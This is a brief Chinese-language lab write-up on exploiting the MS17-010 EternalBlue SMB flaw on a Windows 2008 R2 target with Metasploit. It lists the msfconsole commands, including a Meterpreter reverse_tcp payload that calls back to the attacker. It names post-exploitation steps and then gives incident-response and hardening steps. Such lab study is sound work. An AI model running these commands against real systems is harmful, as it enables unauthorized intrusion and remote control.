0x00:ms17010
2017的windows操作系统漏洞。
永恒之蓝病毒就是利用此漏洞(windows组件漏洞SMB)为基础去搞事情。
0x01:环境
1.攻击机:kali msf
2.靶机:windows 2008 x64 R2 开放了139,445端口
0x02:利用过程
msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 靶机ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost 攻击ip
到这里我们已经拿到了2008的shell。
0x03:password
0x04:stop firewall
0x05:open 3389
0x06:login
到这里我们已经拿到了靶机的权限。
0x07:靶机应急
0.检查防火墙的状态
防火墙被关闭
开启防火墙
0.修改管理员的密码
1.查用户(注意隐藏用户)
删除隐藏用户。
2.可疑进程
敏感端口,到这里大家应该知道入侵者是如何进的你的家。
关闭这个奇怪的进程。
3.封堵端口
检测我们的配置是否生效。
攻击失败。
0x08:总结1
利用smb漏洞去获取靶机权限--获取账号密码--开3389--连上--之后该做啥你我都懂。
修改管理员密码--查隐藏用户-杀可疑进程-封堵端口--打补丁。装杀软。
0x08:总结2
此实验后渗透阶段还没有写:留后门(权限维持)、清除日志。
尝试了msf的后门不太稳定。
